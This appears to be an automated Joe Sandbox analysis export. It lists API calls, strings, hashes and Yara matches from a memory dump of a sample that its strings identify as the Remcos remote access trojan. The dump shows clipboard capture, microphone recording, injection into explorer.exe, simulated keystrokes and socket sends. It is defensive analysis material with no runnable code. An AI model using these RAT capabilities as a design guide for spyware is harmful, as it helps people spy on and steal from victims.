Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Similarity
• API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
• String ID: CloseChat$DisplayMessage$GetMessage
• API String ID: 2956720200-749203953
• Opcode ID: 92a42e6f76523c23ad071d277faa5832b5c30b25a00b0af7c670b91f71b4b998
• Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
• Opcode Fuzzy Hash: 92a42e6f76523c23ad071d277faa5832b5c30b25a00b0af7c670b91f71b4b998
• Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
APIs
  • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
• WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
• CloseHandle.KERNEL32(00000000), ref: 00417E20
• DeleteFileA.KERNEL32(00000000), ref: 00417E2F
• ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Similarity
• API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
• String ID: 0VG$0VG$<$@$Temp
• API String ID: 1704390241-2575729100
• Opcode ID: 770267ec3d45abc508c60553e0d69256dfd3bd3466962ea0f4637c0737b4c84d
• Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
• Opcode Fuzzy Hash: 770267ec3d45abc508c60553e0d69256dfd3bd3466962ea0f4637c0737b4c84d
• Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
APIs
• OpenClipboard.USER32 ref: 0041697C
• EmptyClipboard.USER32 ref: 0041698A
• CloseClipboard.USER32 ref: 00416990
• OpenClipboard.USER32 ref: 00416997
• GetClipboardData.USER32(0000000D), ref: 004169A7
• GlobalLock.KERNEL32(00000000), ref: 004169B0
• GlobalUnlock.KERNEL32(00000000), ref: 004169B9
• CloseClipboard.USER32 ref: 004169BF
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Similarity
• API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
• String ID: !D@
• API String ID: 2172192267-604454484
• Opcode ID: da78ba80ec0729aaebbd7618c01a60a0d67124b513bef4f543176b1e835a0158
• Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
• Opcode Fuzzy Hash: da78ba80ec0729aaebbd7618c01a60a0d67124b513bef4f543176b1e835a0158
• Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
APIs
• CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
• MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
• GetFileSize.KERNEL32(?,00000000), ref: 0041346D
• UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
• CloseHandle.KERNEL32(00000000), ref: 0041349A
• CloseHandle.KERNEL32(?), ref: 004134A0
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Similarity
• API ID: File$CloseHandleView$CreateMappingSizeUnmap
• String ID:
• API String ID: 297527592-0
• Opcode ID: 574f29b59094fb47ce71c879203f8806fd1a71798bcc0508934a1059045681f6
• Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
• Opcode Fuzzy Hash: 574f29b59094fb47ce71c879203f8806fd1a71798bcc0508934a1059045681f6
• Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
• OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Similarity
• API ID: Service$CloseHandle$Open$ControlManager
• String ID:
• API String ID: 221034970-0
• Opcode ID: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
• Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
• Opcode Fuzzy Hash: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
• Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
APIs
• _free.LIBCMT ref: 004481B5
  • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
• _free.LIBCMT ref: 004481C1
• _free.LIBCMT ref: 004481CC
• _free.LIBCMT ref: 004481D7
• _free.LIBCMT ref: 004481E2
• _free.LIBCMT ref: 004481ED
• _free.LIBCMT ref: 004481F8
• _free.LIBCMT ref: 00448203
• _free.LIBCMT ref: 0044820E
• _free.LIBCMT ref: 0044821C
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
• Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
• Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
• Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Similarity
• API ID: Eventinet_ntoa
• String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
• API String ID: 3578746661-3604713145
• Opcode ID: f263e4c13fc2064b78efa21c35b83796e15668e555435fd99ba599c6ad5ca075
• Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
• Opcode Fuzzy Hash: f263e4c13fc2064b78efa21c35b83796e15668e555435fd99ba599c6ad5ca075
• Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE

APIs
• DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: DecodePointer
• String ID: acos$asin$exp$log$log10$pow$sqrt
• API String ID: 3527080286-3064271455
• Opcode ID: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
• Instruction ID: a80f67f54703b8f0c72b4cfac69ffbb6288a0afb30985e2ab5cebdbe3ffe6fde
• Opcode Fuzzy Hash: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
• Instruction Fuzzy Hash: BB515071900909DBCF10DF58E9481BDBBB0FF49306F924197D841A7396DB798928CB1E

APIs
• GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,PkGNG,0044BBB1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B47E
• __fassign.LIBCMT ref: 0044B4F9
• __fassign.LIBCMT ref: 0044B514
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
• WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BBB1,?), ref: 0044B559
• WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BBB1,?), ref: 0044B592
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID: PkGNG
• API String ID: 1324828854-263838557
• Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
• Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
• Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
• Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9

APIs
• ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
  • Part of subcall function 0041C516: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
• Sleep.KERNEL32(00000064), ref: 0041755C
• DeleteFileW.KERNEL32(00000000), ref: 00417590
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: File$CreateDeleteExecuteShellSleep
• String ID: /t $\sysinfo.txt$dxdiag$open$temp
• API String ID: 1462127192-2001430897
• Opcode ID: 0d67962283f2148fab1b3333e93946e14c4c28236009ab2eda98070440fecb3d
• Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
• Opcode Fuzzy Hash: 0d67962283f2148fab1b3333e93946e14c4c28236009ab2eda98070440fecb3d
• Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C

APIs
• GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 00407418
• GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Users\user\Desktop\LdSbZG1iH6.exe), ref: 004074D9
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: CurrentProcess
• String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
• API String ID: 2050909247-4242073005
• Opcode ID: fabc3931959a25f7a31d3ecd74c529253d596e7bbbcd6e820e444b19b129e129
• Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
• Opcode Fuzzy Hash: fabc3931959a25f7a31d3ecd74c529253d596e7bbbcd6e820e444b19b129e129
• Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F

APIs
• _strftime.LIBCMT ref: 00401D50
  • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
• waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
• waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
• waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
• String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
• API String ID: 3809562944-243156785
• Opcode ID: 5ca57e464fc48cfd7ac60de242ae16507c8b77f4a1a81d17ad6b6b7cf7425d61
• Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
• Opcode Fuzzy Hash: 5ca57e464fc48cfd7ac60de242ae16507c8b77f4a1a81d17ad6b6b7cf7425d61
• Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E

APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
• int.LIBCPMT ref: 00410EBC
  • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
  • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
• std::_Facet_Register.LIBCPMT ref: 00410EFC
• std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
• __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
• __Init_thread_footer.LIBCMT ref: 00410F64
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
• String ID: ,kG$0kG
• API String ID: 3815856325-2015055088
• Opcode ID: 9b6f417909eb5cd4a3a9238d92eaca8e17f16862a4fd72c37d6a1f751429c824
• Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
• Opcode Fuzzy Hash: 9b6f417909eb5cd4a3a9238d92eaca8e17f16862a4fd72c37d6a1f751429c824
• Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D

APIs
• CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
• waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
• waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
• waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
• waveInStart.WINMM ref: 00401CFE
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
• String ID: dMG$|MG$PG
• API String ID: 1356121797-532278878
• Opcode ID: e50daa58507802a607b8e69ff53587dfa1525f8723cff621260b0af96f5d677f
• Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
• Opcode Fuzzy Hash: e50daa58507802a607b8e69ff53587dfa1525f8723cff621260b0af96f5d677f
• Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C

APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
  • Part of subcall function 0041D5A0: RegisterClassExA.USER32(00000030), ref: 0041D5EC
  • Part of subcall function 0041D5A0: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
  • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
• ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
• lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
• Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
• TranslateMessage.USER32(?), ref: 0041D57A
• DispatchMessageA.USER32(?), ref: 0041D584
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D591
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
• String ID: Remcos
• API String ID: 1970332568-165870891
• Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
• Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
• Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
• Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58

Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 41332500f0008602d77d1c660e50033fd15bda36b9a02a1f3ccc300d02d52732
• Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
• Opcode Fuzzy Hash: 41332500f0008602d77d1c660e50033fd15bda36b9a02a1f3ccc300d02d52732
                                                                                                                                                • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                                                                                                                APIs
                                                                                                                                                • GetCPInfo.KERNEL32(?,?), ref: 00453EAF
                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00453F32
                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00453FC5
                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 00454014
                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00453FDC
                                                                                                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00454058
                                                                                                                                                • __freea.LIBCMT ref: 00454083
                                                                                                                                                • __freea.LIBCMT ref: 0045408F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 201697637-0
                                                                                                                                                • Opcode ID: 0e4c9693fbb30d8259a9360a9357c9a64508312006b92e836ecbd2da2b3ae83b
                                                                                                                                                • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                                                                                                                                • Opcode Fuzzy Hash: 0e4c9693fbb30d8259a9360a9357c9a64508312006b92e836ecbd2da2b3ae83b
                                                                                                                                                • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                                                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                                                                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                                                                                                                • _free.LIBCMT ref: 00445515
                                                                                                                                                • _free.LIBCMT ref: 0044552E
                                                                                                                                                • _free.LIBCMT ref: 00445560
                                                                                                                                                • _free.LIBCMT ref: 00445569
                                                                                                                                                • _free.LIBCMT ref: 00445575
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                • String ID: C
                                                                                                                                                • API String ID: 1679612858-1037565863
                                                                                                                                                • Opcode ID: 2813a1e0ac90985d52fee0968b9a0cfa35de9e1761f336dc1444ec918196fcc8
                                                                                                                                                • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                                                                                                                • Opcode Fuzzy Hash: 2813a1e0ac90985d52fee0968b9a0cfa35de9e1761f336dc1444ec918196fcc8
                                                                                                                                                • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: tcp$udp
                                                                                                                                                • API String ID: 0-3725065008
                                                                                                                                                • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                                                                                • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                                                                                                                                • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                                                                                • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                                                                                                                APIs
                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 004018BE
                                                                                                                                                • ExitThread.KERNEL32 ref: 004018F6
                                                                                                                                                • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                                                                                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                                                                • String ID: PkG$XMG$NG$NG
                                                                                                                                                • API String ID: 1649129571-3151166067
                                                                                                                                                • Opcode ID: 49aca21aedc77406ad6ecb676b3e8f12959c6e3be557b7633b64e8435ff40de0
                                                                                                                                                • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                                                                                                                                • Opcode Fuzzy Hash: 49aca21aedc77406ad6ecb676b3e8f12959c6e3be557b7633b64e8435ff40de0
                                                                                                                                                • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FB4,?,00000000,00408037,00000000), ref: 00407A00
                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A48
                                                                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A88
                                                                                                                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00407AA5
                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AD0
                                                                                                                                                • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                                                                                                                  • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                                                                                                                                  • Part of subcall function 00404B96: SetEvent.KERNEL32(?), ref: 00404BC3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                                                                • String ID: .part
                                                                                                                                                • API String ID: 1303771098-3499674018
                                                                                                                                                • Opcode ID: c438b6c3ad66c49b0c8fac277bcd0795076709a98bb5b529a829fc4e1ae4dc70
                                                                                                                                                • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                                                                                                                                • Opcode Fuzzy Hash: c438b6c3ad66c49b0c8fac277bcd0795076709a98bb5b529a829fc4e1ae4dc70
                                                                                                                                                • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                                                                                                                                APIs
                                                                                                                                                • SendInput.USER32 ref: 00419A25
                                                                                                                                                • SendInput.USER32(00000001,?,0000001C,00000000), ref: 00419A4D
                                                                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                                                                                                                • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                                                                                                                  • Part of subcall function 004199CE: MapVirtualKeyA.USER32(00000000,00000000), ref: 004199D4
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: InputSend$Virtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1167301434-0
